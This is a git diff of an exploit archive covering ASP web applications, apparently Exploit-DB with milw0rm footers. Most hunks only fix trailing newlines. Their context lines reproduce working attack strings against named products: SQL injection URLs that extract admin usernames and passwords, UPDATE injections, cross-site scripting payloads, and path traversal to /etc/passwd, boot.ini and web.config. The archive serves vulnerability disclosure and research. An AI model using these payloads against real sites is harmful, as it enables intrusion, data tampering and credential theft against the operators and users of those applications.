' - +password: ' or ' \ No newline at end of file diff --git a/platforms/asp/webapps/32729.txt b/platforms/asp/webapps/32729.txt index e17b0c7c3..58d7e623f 100755 --- a/platforms/asp/webapps/32729.txt +++ b/platforms/asp/webapps/32729.txt @@ -4,5 +4,4 @@ LinksPro is prone to an SQL-injection vulnerability because it fails to sufficie Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[Path]/default.asp?QS=True&OrderDirection='[SQL]&OrderField=codefixerlp_tblLink_flddateadded - +http://www.example.com/[Path]/default.asp?QS=True&OrderDirection='[SQL]&OrderField=codefixerlp_tblLink_flddateadded \ No newline at end of file diff --git a/platforms/asp/webapps/32888.txt b/platforms/asp/webapps/32888.txt index d73c885dc..d1459594e 100755 --- a/platforms/asp/webapps/32888.txt +++ b/platforms/asp/webapps/32888.txt @@ -9,5 +9,4 @@ Asbru Web Content Management 6.5 and 6.6.9 are vulnerable; other versions may al http://www.example.com/page.asp?id=1 http://www.example.com/page.asp?id=1 AND 1=2 http://www.example.com/page.asp?id=1 AND 1=1 -http://www.example.com/webadmin/login.asp?url="> - +http://www.example.com/webadmin/login.asp?url="> \ No newline at end of file diff --git a/platforms/asp/webapps/3295.txt b/platforms/asp/webapps/3295.txt index 68eb7eedf..0bbf29d88 100755 --- a/platforms/asp/webapps/3295.txt +++ b/platforms/asp/webapps/3295.txt @@ -34,4 +34,4 @@ Download: open http://www.aspindir.com/indir.asp?id=3538 and click "Ýndirmek ---------------------------------------------------- -# milw0rm.com [2007-02-12] +# milw0rm.com [2007-02-12] \ No newline at end of file diff --git a/platforms/asp/webapps/32953.vbs b/platforms/asp/webapps/32953.vbs index 98736cedc..7ec016801 100755 --- a/platforms/asp/webapps/32953.vbs +++ b/platforms/asp/webapps/32953.vbs @@ -78,4 +78,4 @@ Else IsSuccess = False End If 'Wscript.Sleep 500 '....... -End Function +End Function \ No newline at end of file diff --git a/platforms/asp/webapps/3301.txt b/platforms/asp/webapps/3301.txt index 6d8b1473e..532d50b3c 100755 --- a/platforms/asp/webapps/3301.txt +++ b/platforms/asp/webapps/3301.txt @@ -14,4 +14,4 @@ XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX # Exp. : http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';-- -# milw0rm.com [2007-02-13] +# milw0rm.com [2007-02-13] \ No newline at end of file diff --git a/platforms/asp/webapps/3317.txt b/platforms/asp/webapps/3317.txt index ad8da6e62..074719797 100755 --- a/platforms/asp/webapps/3317.txt +++ b/platforms/asp/webapps/3317.txt @@ -10,4 +10,4 @@ Found by: beks http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,Password+from+Params -# milw0rm.com [2007-02-15] +# milw0rm.com [2007-02-15] \ No newline at end of file diff --git a/platforms/asp/webapps/3318.txt b/platforms/asp/webapps/3318.txt index b6874121f..084707e73 100755 --- a/platforms/asp/webapps/3318.txt +++ b/platforms/asp/webapps/3318.txt @@ -27,4 +27,4 @@ Download: http://www.aspindir.com/Goster/4656 ----------------------------------------------------------------------- -# milw0rm.com [2007-02-15] +# milw0rm.com [2007-02-15] \ No newline at end of file diff --git a/platforms/asp/webapps/3321.txt b/platforms/asp/webapps/3321.txt index a3d3b0a98..df956b6b1 100755 --- a/platforms/asp/webapps/3321.txt +++ b/platforms/asp/webapps/3321.txt @@ -27,4 +27,4 @@ Tesekkurler: pang0, chaos, can bjorn, DJR =================================X=O=R=O=N================================= -# milw0rm.com [2007-02-16] +# milw0rm.com [2007-02-16] \ No newline at end of file diff --git a/platforms/asp/webapps/3339.txt b/platforms/asp/webapps/3339.txt index 8eb9e91d9..0311030b0 100755 --- a/platforms/asp/webapps/3339.txt +++ b/platforms/asp/webapps/3339.txt @@ -23,4 +23,4 @@ Page title is username + password ----------------------------------------------------------------------- -# milw0rm.com [2007-02-20] +# milw0rm.com [2007-02-20] \ No newline at end of file diff --git a/platforms/asp/webapps/33647.txt b/platforms/asp/webapps/33647.txt index 2505411f9..143e8a351 100755 --- a/platforms/asp/webapps/33647.txt +++ b/platforms/asp/webapps/33647.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Portrait Campaign Manager 4.6.1.22 is vulnerable; other versions prior to 4.6 SP3 may also be affected. -http://www.example.com/MHCwa/DefaultAn.aspx?LayoutID= +http://www.example.com/MHCwa/DefaultAn.aspx?LayoutID= \ No newline at end of file diff --git a/platforms/asp/webapps/33704.txt b/platforms/asp/webapps/33704.txt index 73e055766..f5322ff59 100755 --- a/platforms/asp/webapps/33704.txt +++ b/platforms/asp/webapps/33704.txt @@ -21,4 +21,4 @@ We shouldnt encode the script, or, the xss will fail. Liscker -2010.3.4 +2010.3.4 \ No newline at end of file diff --git a/platforms/asp/webapps/33721.txt b/platforms/asp/webapps/33721.txt index b3477a3cb..c056c654d 100755 --- a/platforms/asp/webapps/33721.txt +++ b/platforms/asp/webapps/33721.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Max Network Technology BBSMAX 4.2 is vulnerable; other versions may also be affected. -http://www.example.com/forum1/post.aspx?action=newthread"> +http://www.example.com/forum1/post.aspx?action=newthread"> \ No newline at end of file diff --git a/platforms/asp/webapps/33722.txt b/platforms/asp/webapps/33722.txt index 455b78a05..4c1cda04f 100755 --- a/platforms/asp/webapps/33722.txt +++ b/platforms/asp/webapps/33722.txt @@ -10,4 +10,4 @@ ASPCode CMS 1.5.8 is vulnerable; other versions may also be affected. http://www.example.com/default.asp?sec=1&ma1="> http://www.example.com/default.asp?sec=1&tag="> http://www.example.com/default.asp?sec=1&ma2="> -http://www.example.com/default.asp?sec=33&ma1=forgotpass +http://www.example.com/default.asp?sec=33&ma1=forgotpass \ No newline at end of file diff --git a/platforms/asp/webapps/3390.txt b/platforms/asp/webapps/3390.txt index 1e5802399..6c83c18a2 100755 --- a/platforms/asp/webapps/3390.txt +++ b/platforms/asp/webapps/3390.txt @@ -58,4 +58,4 @@ # ######################################################################### -# milw0rm.com [2007-03-01] +# milw0rm.com [2007-03-01] \ No newline at end of file diff --git a/platforms/asp/webapps/33959.txt b/platforms/asp/webapps/33959.txt index d9a56a499..5fae58c30 100755 --- a/platforms/asp/webapps/33959.txt +++ b/platforms/asp/webapps/33959.txt @@ -10,4 +10,4 @@ Consona Dynamic Agent Consona Subscriber Assistance http://www.example.com/sdccommon/verify/asp/n6plugindestructor.asp?backurl=";} -# milw0rm.com [2007-03-13] +# milw0rm.com [2007-03-13] \ No newline at end of file diff --git a/platforms/asp/webapps/3481.htm b/platforms/asp/webapps/3481.htm index d7f4fda77..623cb5849 100755 --- a/platforms/asp/webapps/3481.htm +++ b/platforms/asp/webapps/3481.htm @@ -62,4 +62,4 @@ http://www.UniquE-Key.Org --> -# milw0rm.com [2007-03-15] +# milw0rm.com [2007-03-15] \ No newline at end of file diff --git a/platforms/asp/webapps/34920.txt b/platforms/asp/webapps/34920.txt index 6c0004b3f..2edb15182 100755 --- a/platforms/asp/webapps/34920.txt +++ b/platforms/asp/webapps/34920.txt @@ -36,4 +36,4 @@ Exploit view source web.config: http://[host]/css/HttpCombiner.ashx?s=~/web.conf VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: securitydaily.net -CONTACT: whitehat@hotmail.com +CONTACT: whitehat@hotmail.com \ No newline at end of file diff --git a/platforms/asp/webapps/3493.txt b/platforms/asp/webapps/3493.txt index fcd594c6d..ec25e6274 100755 --- a/platforms/asp/webapps/3493.txt +++ b/platforms/asp/webapps/3493.txt @@ -247,4 +247,4 @@ UniquE-Key{UniquE-Cracker} UniquE(at)UniquE-Key.Org http://www.UniquE-Key.Org -# milw0rm.com [2007-03-15] +# milw0rm.com [2007-03-15] \ No newline at end of file diff --git a/platforms/asp/webapps/35065.txt b/platforms/asp/webapps/35065.txt index 2ee43951c..5ee897dab 100755 --- a/platforms/asp/webapps/35065.txt +++ b/platforms/asp/webapps/35065.txt @@ -12,4 +12,4 @@ http://www.example.com/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ea http://www.example.com/Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Ealert%28%2=7test%27%29%3C/script%3E&I:100&view=InterfaceDetails -http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo= +http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo= \ No newline at end of file diff --git a/platforms/asp/webapps/3520.txt b/platforms/asp/webapps/3520.txt index 4358d9c70..406db3812 100755 --- a/platforms/asp/webapps/3520.txt +++ b/platforms/asp/webapps/3520.txt @@ -17,4 +17,4 @@ greetz : VoLqaN, x-MastER """"""""""""""""""""" -# milw0rm.com [2007-03-19] +# milw0rm.com [2007-03-19] \ No newline at end of file diff --git a/platforms/asp/webapps/3534.txt b/platforms/asp/webapps/3534.txt index 66f08e03b..7ec5d38ee 100755 --- a/platforms/asp/webapps/3534.txt +++ b/platforms/asp/webapps/3534.txt @@ -16,4 +16,4 @@ Thanx : redLine - Hackinger - Liarhack - SaCReD SeeR - MaTRax - KinSize - Boliva And All TURKISH HACKERS ! -# milw0rm.com [2007-03-21] +# milw0rm.com [2007-03-21] \ No newline at end of file diff --git a/platforms/asp/webapps/3536.txt b/platforms/asp/webapps/3536.txt index 3f0a2ef1f..d07084ff8 100755 --- a/platforms/asp/webapps/3536.txt +++ b/platforms/asp/webapps/3536.txt @@ -16,4 +16,4 @@ Thanx : redLine - Hackinger - Liarhack - SaCReD SeeR - MaTRax - KinSize - Boliva And All TURKISH HACKERS ! -# milw0rm.com [2007-03-21] +# milw0rm.com [2007-03-21] \ No newline at end of file diff --git a/platforms/asp/webapps/3546.txt b/platforms/asp/webapps/3546.txt index 043d39535..2d93f90b0 100755 --- a/platforms/asp/webapps/3546.txt +++ b/platforms/asp/webapps/3546.txt @@ -18,4 +18,4 @@ greetz : VoLqaN, x-MastER,Ekin0x,xoron """"""""""""""""""""" www.p4r4d0x.com -# milw0rm.com [2007-03-22] +# milw0rm.com [2007-03-22] \ No newline at end of file diff --git a/platforms/asp/webapps/3549.txt b/platforms/asp/webapps/3549.txt index b008b6c32..e871b3155 100755 --- a/platforms/asp/webapps/3549.txt +++ b/platforms/asp/webapps/3549.txt @@ -15,4 +15,4 @@ Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - Kin And All TURKISH HACKERS ! -# milw0rm.com [2007-03-23] +# milw0rm.com [2007-03-23] \ No newline at end of file diff --git a/platforms/asp/webapps/3550.txt b/platforms/asp/webapps/3550.txt index b668e69c0..9d114863e 100755 --- a/platforms/asp/webapps/3550.txt +++ b/platforms/asp/webapps/3550.txt @@ -15,4 +15,4 @@ Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - Kin And All TURKISH HACKERS ! -# milw0rm.com [2007-03-23] +# milw0rm.com [2007-03-23] \ No newline at end of file diff --git a/platforms/asp/webapps/3551.txt b/platforms/asp/webapps/3551.txt index fdd1115eb..037e7a2da 100755 --- a/platforms/asp/webapps/3551.txt +++ b/platforms/asp/webapps/3551.txt @@ -15,4 +15,4 @@ Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - Kin And All TURKISH HACKERS ! -# milw0rm.com [2007-03-23] +# milw0rm.com [2007-03-23] \ No newline at end of file diff --git a/platforms/asp/webapps/3556.htm b/platforms/asp/webapps/3556.htm index 999974e4b..334f69077 100755 --- a/platforms/asp/webapps/3556.htm +++ b/platforms/asp/webapps/3556.htm @@ -63,4 +63,4 @@ -# milw0rm.com [2007-03-23] +# milw0rm.com [2007-03-23] \ No newline at end of file diff --git a/platforms/asp/webapps/3558.htm b/platforms/asp/webapps/3558.htm index ad96e0093..21d958bc9 100755 --- a/platforms/asp/webapps/3558.htm +++ b/platforms/asp/webapps/3558.htm @@ -63,4 +63,4 @@ -# milw0rm.com [2007-03-23] +# milw0rm.com [2007-03-23] \ No newline at end of file diff --git a/platforms/asp/webapps/35758.txt b/platforms/asp/webapps/35758.txt index 8bfa3cb54..895acfdd3 100755 --- a/platforms/asp/webapps/35758.txt +++ b/platforms/asp/webapps/35758.txt @@ -10,4 +10,4 @@ https://www.example.com/wd/wdinvite.asp?SID='> https://www.example.com/wd/connect.asp?mode=joinmeeting&uid='>&sid='> -https://www.example.com/wd/applets/Error.asp?type= +https://www.example.com/wd/applets/Error.asp?type= \ No newline at end of file diff --git a/platforms/asp/webapps/35807.txt b/platforms/asp/webapps/35807.txt index 6fe25c364..cceab5be1 100755 --- a/platforms/asp/webapps/35807.txt +++ b/platforms/asp/webapps/35807.txt @@ -7,5 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Kentico CMS 5.5R2.23 is vulnerable; other versions may also be affected. POST http://localhost/examples/webparts/membership/users-viewer.aspx HTTP/1.1 -&userContextMenu_parameter=%22%20onmouseover%3Dalert%281%29%20zsl%3D%22 - +&userContextMenu_parameter=%22%20onmouseover%3Dalert%281%29%20zsl%3D%22 \ No newline at end of file diff --git a/platforms/asp/webapps/36019.txt b/platforms/asp/webapps/36019.txt index 9162bbefb..c9856e862 100755 --- a/platforms/asp/webapps/36019.txt +++ b/platforms/asp/webapps/36019.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Community Server 2007 and 2008 are vulnerable; other versions may also be affected. -http://www.example.com/utility/TagSelector.aspx?TagEditor=[XSS] +http://www.example.com/utility/TagSelector.aspx?TagEditor=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/36284.txt b/platforms/asp/webapps/36284.txt index d03a1e1d6..0591fc4a5 100755 --- a/platforms/asp/webapps/36284.txt +++ b/platforms/asp/webapps/36284.txt @@ -12,5 +12,4 @@ username=">&password=bbb&rememberme http://www.example.com/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE -http://www.example.com/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE - +http://www.example.com/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE \ No newline at end of file diff --git a/platforms/asp/webapps/37577.txt b/platforms/asp/webapps/37577.txt index 9c47931e2..6a8734b9e 100755 --- a/platforms/asp/webapps/37577.txt +++ b/platforms/asp/webapps/37577.txt @@ -5,4 +5,4 @@ PolarisCMS is prone to a cross-site scripting vulnerability because the applicat An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/reselleradmin/blog.aspx?%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E -http://www.example.com/reselleradmin/blog.aspx?%27onmouseover=prompt(101)%3E +http://www.example.com/reselleradmin/blog.aspx?%27onmouseover=prompt(101)%3E \ No newline at end of file diff --git a/platforms/asp/webapps/3767.txt b/platforms/asp/webapps/3767.txt index 038ed0752..9bc814565 100755 --- a/platforms/asp/webapps/3767.txt +++ b/platforms/asp/webapps/3767.txt @@ -17,4 +17,4 @@ Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - Kin And All TURKISH HACKERS ! -# milw0rm.com [2007-04-19] +# milw0rm.com [2007-04-19] \ No newline at end of file diff --git a/platforms/asp/webapps/37689.txt b/platforms/asp/webapps/37689.txt index 8b1e17b6b..6d875f6d1 100755 --- a/platforms/asp/webapps/37689.txt +++ b/platforms/asp/webapps/37689.txt @@ -23,5 +23,4 @@ Http response : 28 Microsoft OLE DB Provider for SQL Server 8 21 error ' 8 80040e14 8 ' 1f -84 Unclosed quotation mark after the character string ') ORDER BY tbl_Categories.cOrder, tbl_Forums.fOrder, tbl_Topics.tLastPostDate'. 7 1f - +84 Unclosed quotation mark after the character string ') ORDER BY tbl_Categories.cOrder, tbl_Forums.fOrder, tbl_Topics.tLastPostDate'. 7 1f \ No newline at end of file diff --git a/platforms/asp/webapps/3831.txt b/platforms/asp/webapps/3831.txt index 368cfe71b..d016fd9bd 100755 --- a/platforms/asp/webapps/3831.txt +++ b/platforms/asp/webapps/3831.txt @@ -19,4 +19,4 @@ download.asp?File=../../../../etc/passwd&pt=zip \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/ -# milw0rm.com [2007-05-02] +# milw0rm.com [2007-05-02] \ No newline at end of file diff --git a/platforms/asp/webapps/38479.txt b/platforms/asp/webapps/38479.txt index 45258c683..e7f989b7c 100755 --- a/platforms/asp/webapps/38479.txt +++ b/platforms/asp/webapps/38479.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Service Store 5.3 SP3 (5.33.946.0) is vulnerable; other versions may also be affected. https://www.example.com/SPS/Portal/default.aspx?'"--> - [XSS] + [XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/3905.txt b/platforms/asp/webapps/3905.txt index b35b9eeab..55e0a5cb0 100755 --- a/platforms/asp/webapps/3905.txt +++ b/platforms/asp/webapps/3905.txt @@ -10,4 +10,4 @@ example:http://philboard.somee.com/W1L3D4_bolum.asp?forumid=-99+union+all+select contact: by_gsy@hotmail.com & kerem125@kerem125.com Special thx to:by_emr3 , ercu_145, bolivar, voltigore, mardinli, f10 -# milw0rm.com [2007-05-11] +# milw0rm.com [2007-05-11] \ No newline at end of file diff --git a/platforms/asp/webapps/3914.txt b/platforms/asp/webapps/3914.txt index 249493d81..4305fbd77 100755 --- a/platforms/asp/webapps/3914.txt +++ b/platforms/asp/webapps/3914.txt @@ -11,4 +11,4 @@ exploit:/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,passw contact:by_gsy@hotmail.com&kerem125@kerem125.com Specialthxto:by_emr3,ercu_145,bolivar,voltigore,f10 -# milw0rm.com [2007-05-13] +# milw0rm.com [2007-05-13] \ No newline at end of file diff --git a/platforms/asp/webapps/3936.txt b/platforms/asp/webapps/3936.txt index c84cb1e63..2e8f5832c 100755 --- a/platforms/asp/webapps/3936.txt +++ b/platforms/asp/webapps/3936.txt @@ -14,4 +14,4 @@ Contact : kerem125@kerem125.com & by_gsy@hotmail.com RunawaySoft Haber portal v1.0 (tr) Database Disclosure Example: [site.com]/[path]/haber/data/xice.mdb -# milw0rm.com [2007-05-16] +# milw0rm.com [2007-05-16] \ No newline at end of file diff --git a/platforms/asp/webapps/39850.txt b/platforms/asp/webapps/39850.txt index 8e35722c8..424b28d3b 100755 --- a/platforms/asp/webapps/39850.txt +++ b/platforms/asp/webapps/39850.txt @@ -120,4 +120,4 @@ https://twitter.com/afterlogic/status/734764320165400576 -- Sr. Information Security Engineer -https://www.mehmetince.net +https://www.mehmetince.net \ No newline at end of file diff --git a/platforms/asp/webapps/39904.txt b/platforms/asp/webapps/39904.txt index fabaa95bf..5a356cf70 100755 --- a/platforms/asp/webapps/39904.txt +++ b/platforms/asp/webapps/39904.txt @@ -293,4 +293,4 @@ CSCuy28100 CSCux17178 Read more on our blog: -http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/ +http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/ \ No newline at end of file diff --git a/platforms/asp/webapps/4007.txt b/platforms/asp/webapps/4007.txt index f13f7c717..13a33f259 100755 --- a/platforms/asp/webapps/4007.txt +++ b/platforms/asp/webapps/4007.txt @@ -15,4 +15,4 @@ GreetZ Goes To : BURCU (Her Ne Kadar Bilmesede :D ) Ayrica Dostum Erchin'e ( Erc and also to Str0ke For Posting :) */ -# milw0rm.com [2007-05-30] +# milw0rm.com [2007-05-30] \ No newline at end of file diff --git a/platforms/asp/webapps/40383.txt b/platforms/asp/webapps/40383.txt index ec2b6e408..4362fcf6e 100755 --- a/platforms/asp/webapps/40383.txt +++ b/platforms/asp/webapps/40383.txt @@ -692,4 +692,4 @@ Content-Length: 10179 -(...) +(...) \ No newline at end of file diff --git a/platforms/asp/webapps/4040.txt b/platforms/asp/webapps/4040.txt index aee3346fe..0ea82b7ba 100755 --- a/platforms/asp/webapps/4040.txt +++ b/platforms/asp/webapps/4040.txt @@ -13,4 +13,4 @@ Contact : kerem125@kerem125.com & by_gsy@hotmail.com -xYz - F-10 - DarXBoyZ - GencDefacer And Str0ke for posting Milw0rm ######################################################################################## -# milw0rm.com [2007-06-06] +# milw0rm.com [2007-06-06] \ No newline at end of file diff --git a/platforms/asp/webapps/4057.txt b/platforms/asp/webapps/4057.txt index 179b100b0..d01da93e8 100755 --- a/platforms/asp/webapps/4057.txt +++ b/platforms/asp/webapps/4057.txt @@ -12,4 +12,4 @@ Thanx : redLine - Hackinger - excellance - Liarhack - KinSize - gsy - kerem125 - And All TURKISH HACKERS ! -# milw0rm.com [2007-06-09] +# milw0rm.com [2007-06-09] \ No newline at end of file diff --git a/platforms/asp/webapps/4083.txt b/platforms/asp/webapps/4083.txt index e1b0b05eb..0bfdbdf14 100755 --- a/platforms/asp/webapps/4083.txt +++ b/platforms/asp/webapps/4083.txt @@ -18,4 +18,4 @@ www.dosyacek.com /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// -# milw0rm.com [2007-06-20] +# milw0rm.com [2007-06-20] \ No newline at end of file diff --git a/platforms/asp/webapps/4198.txt b/platforms/asp/webapps/4198.txt index f7bc91f58..407007e96 100755 --- a/platforms/asp/webapps/4198.txt +++ b/platforms/asp/webapps/4198.txt @@ -14,4 +14,4 @@ It is possible to delete not only the files in the folders listed, but also ouside its directory. Also possible sql injections in other areas. -# milw0rm.com [2007-07-18] +# milw0rm.com [2007-07-18] \ No newline at end of file diff --git a/platforms/asp/webapps/4239.txt b/platforms/asp/webapps/4239.txt index 5acc6bc12..a5f3fa20f 100755 --- a/platforms/asp/webapps/4239.txt +++ b/platforms/asp/webapps/4239.txt @@ -62,4 +62,4 @@ sub usage( ) exit(0); } -# milw0rm.com [2007-07-28] +# milw0rm.com [2007-07-28] \ No newline at end of file diff --git a/platforms/asp/webapps/4458.txt b/platforms/asp/webapps/4458.txt index b5c3cbe39..540f0c452 100755 --- a/platforms/asp/webapps/4458.txt +++ b/platforms/asp/webapps/4458.txt @@ -43,4 +43,4 @@ http://[novus]/notas.asp?nota_id=0update+a_nota+set+titulo+=+'Novus Bug Sql Inye -- // ka0x -# milw0rm.com [2007-09-26] +# milw0rm.com [2007-09-26] \ No newline at end of file diff --git a/platforms/asp/webapps/4486.txt b/platforms/asp/webapps/4486.txt index 949e4f585..5c0b25c61 100755 --- a/platforms/asp/webapps/4486.txt +++ b/platforms/asp/webapps/4486.txt @@ -16,4 +16,4 @@ Saz ArkadaÅŸlarım: Hackinger - KinSize - dumenci - Kerem125 - Gsy - F10 And All TURKISH HACKERS ! -# milw0rm.com [2007-10-05] +# milw0rm.com [2007-10-05] \ No newline at end of file diff --git a/platforms/asp/webapps/4578.txt b/platforms/asp/webapps/4578.txt index 1d8313599..29ea11951 100755 --- a/platforms/asp/webapps/4578.txt +++ b/platforms/asp/webapps/4578.txt @@ -23,4 +23,4 @@ ContacT: mohamed_amine_1991@hotmail.com -------------------- -# milw0rm.com [2007-10-28] +# milw0rm.com [2007-10-28] \ No newline at end of file diff --git a/platforms/asp/webapps/4609.txt b/platforms/asp/webapps/4609.txt index 18dc30edd..425e6179b 100755 --- a/platforms/asp/webapps/4609.txt +++ b/platforms/asp/webapps/4609.txt @@ -12,4 +12,4 @@ * * Exploit : Admin User / Password : http://www.site.com/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS)) -# milw0rm.com [2007-11-05] +# milw0rm.com [2007-11-05] \ No newline at end of file diff --git a/platforms/asp/webapps/4644.txt b/platforms/asp/webapps/4644.txt index 0b7654ad6..4ee77c14e 100755 --- a/platforms/asp/webapps/4644.txt +++ b/platforms/asp/webapps/4644.txt @@ -29,4 +29,4 @@ this code with update itemdetl.asp?id=1 Credit goes to Aria-Security.Net Greetz: AurA -# milw0rm.com [2007-11-22] +# milw0rm.com [2007-11-22] \ No newline at end of file diff --git a/platforms/asp/webapps/4687.htm b/platforms/asp/webapps/4687.htm index f1d7cd64f..11b93ab93 100755 --- a/platforms/asp/webapps/4687.htm +++ b/platforms/asp/webapps/4687.htm @@ -28,4 +28,4 @@ Submit:
# Credit: Soroush Dalili found this bug. ##################################################################### -# milw0rm.com [2007-12-03] +# milw0rm.com [2007-12-03] \ No newline at end of file diff --git a/platforms/asp/webapps/4697.txt b/platforms/asp/webapps/4697.txt index babc1c9b1..149c4d79e 100755 --- a/platforms/asp/webapps/4697.txt +++ b/platforms/asp/webapps/4697.txt @@ -38,4 +38,4 @@ null,password,nome,null,data,null+from+utenti+where+Admin=true --------------------------------------------------------------- -# milw0rm.com [2007-12-06] +# milw0rm.com [2007-12-06] \ No newline at end of file diff --git a/platforms/asp/webapps/4730.txt b/platforms/asp/webapps/4730.txt index 97b5490d0..a0d92fa97 100755 --- a/platforms/asp/webapps/4730.txt +++ b/platforms/asp/webapps/4730.txt @@ -361,4 +361,4 @@ Also, you can contact "admin[4t}bugreport{d0t]ir" to fix all these bugs for you AmnPardaz Security Research Team - www.Bugreport.ir Contact: admin[4t}bugreport{d0t]ir -# milw0rm.com [2007-12-13] +# milw0rm.com [2007-12-13] \ No newline at end of file diff --git a/platforms/asp/webapps/4824.py b/platforms/asp/webapps/4824.py index 5c0a8d3c9..33ec36c72 100755 --- a/platforms/asp/webapps/4824.py +++ b/platforms/asp/webapps/4824.py @@ -51,4 +51,4 @@ else: except: print '[+] Not vulnerable!' -# milw0rm.com [2007-12-31] +# milw0rm.com [2007-12-31] \ No newline at end of file diff --git a/platforms/asp/webapps/4848.txt b/platforms/asp/webapps/4848.txt index 2c8535040..b09dccac0 100755 --- a/platforms/asp/webapps/4848.txt +++ b/platforms/asp/webapps/4848.txt @@ -113,4 +113,4 @@ Add content: http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1 http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1 -# milw0rm.com [2008-01-06] +# milw0rm.com [2008-01-06] \ No newline at end of file diff --git a/platforms/asp/webapps/4900.txt b/platforms/asp/webapps/4900.txt index 89f7bd3f8..ed178eb83 100755 --- a/platforms/asp/webapps/4900.txt +++ b/platforms/asp/webapps/4900.txt @@ -99,4 +99,4 @@ # Santise all input which is then used in SQL queries. # -# milw0rm.com [2008-01-12] +# milw0rm.com [2008-01-12] \ No newline at end of file diff --git a/platforms/asp/webapps/4910.pl b/platforms/asp/webapps/4910.pl index 6e44647c0..d28f288cb 100755 --- a/platforms/asp/webapps/4910.pl +++ b/platforms/asp/webapps/4910.pl @@ -133,4 +133,4 @@ print "update: $columnas[$i]\n"; --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-01-14] +# milw0rm.com [2008-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/4921.txt b/platforms/asp/webapps/4921.txt index aa8c267f6..fad5ce1d4 100755 --- a/platforms/asp/webapps/4921.txt +++ b/platforms/asp/webapps/4921.txt @@ -3,4 +3,4 @@ example: http://www.xxx.com/webmail-pro-net/download_view_attachment.aspx?temp_filename=../../../../../../../../../../../../../../../../../../boot.ini -=M.o.B=- -# milw0rm.com [2008-01-16] +# milw0rm.com [2008-01-16] \ No newline at end of file diff --git a/platforms/asp/webapps/4970.txt b/platforms/asp/webapps/4970.txt index 4fdec0c1a..df4612912 100755 --- a/platforms/asp/webapps/4970.txt +++ b/platforms/asp/webapps/4970.txt @@ -51,4 +51,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-01-23] +# milw0rm.com [2008-01-23] \ No newline at end of file diff --git a/platforms/asp/webapps/4971.txt b/platforms/asp/webapps/4971.txt index c4bf841f5..747e5fc56 100755 --- a/platforms/asp/webapps/4971.txt +++ b/platforms/asp/webapps/4971.txt @@ -53,4 +53,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-01-23] +# milw0rm.com [2008-01-23] \ No newline at end of file diff --git a/platforms/asp/webapps/4972.txt b/platforms/asp/webapps/4972.txt index 13a116f22..2001c11ee 100755 --- a/platforms/asp/webapps/4972.txt +++ b/platforms/asp/webapps/4972.txt @@ -51,4 +51,4 @@ Contact: 